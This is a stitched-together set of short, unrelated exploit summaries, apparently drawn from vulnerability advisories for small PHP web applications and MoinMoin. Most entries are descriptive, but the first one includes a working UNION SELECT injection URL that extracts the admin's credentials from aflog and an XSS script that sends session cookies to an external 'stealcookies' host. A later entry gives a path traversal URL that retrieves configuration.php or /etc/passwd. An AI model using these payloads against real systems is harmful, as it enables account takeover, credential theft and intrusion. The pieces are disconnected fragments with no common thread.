SQL injection is possible in comments.php for the GET variable 'id', like this: http://hostname/aflog/comments.php?id='[SQLI]/*. The following POC exposes the username and password of the first registered user (the admin): http://localhost/aflog/comments.php?id='+UNION+SELECT+666,null,concat('username:',username,',password:',password),1,null,1+FROM+members+ORDER+BY+id+DESC+LIMIT+1/*. The same principle could be applied to view.php, but forming the SQL injection string is easier in comments.php, IMHO. A newly registered user can easily compose a URL with an XSS exploit and trick a logged-in user into clicking it to steal their login cookie. Don't go <script>var a="<a href='http://server/stealcookies?"+encodeURI(document.cookie)+"'>here</a>";document.write(a);</script>.
This exploit allows an attacker to inject a malicious cookie into the MoinMoin 1.5.x web application. The malicious cookie can be used to overwrite a file on the server, allowing the attacker to gain access to the system. The exploit is coded in Python and requires the attacker to provide the URL of the MoinMoin application, the username, password, and email address of the user to be created, and the file to be overwritten.
A vulnerability exists in Forum Pay Per Post which allows an attacker to pull admin/user info from the database. The passwords are stored in plaintext and the admin login is at /admin/.
Lama Software kostenlos is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
We can download files present on the server... for example, we can get the file of db credentials, configuration.php. Exploit: http://[www.example.com]/administrator/download.php?fileName=../configuration.php or try to get /etc/passwd :)
OZJournals uses .php-files as its storage, and posts are read from them with the getcontents-function. This protects from traditional LFI-exploits, but the print functionality, for instance, takes an id as a value and allows an attacker to get the contents of files other than intended. Before printing, the php-file is explode()d with "\t", but seeing as many scripts have tabs in their configuration files, an attacker could, with some luck, fish out database credentials or other sensitive data.
A SQL injection vulnerability exists in boastMachine version 3.1 and prior. The vulnerability is due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'mail.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. This can allow the attacker to gain access to the admin panel of the application.
The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'month' parameter to the '/blog.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in the application's database. This can be exploited to bypass authentication and gain access to the administrative panel.
This exploit is based on RST/GHC bugs and allows an attacker to inject malicious SQL code into the Coppermine gallery application. The exploit uses the 'UNION SELECT' statement to inject malicious code into the application.
This exploit allows remote attackers to execute arbitrary code via a long string in the USER command.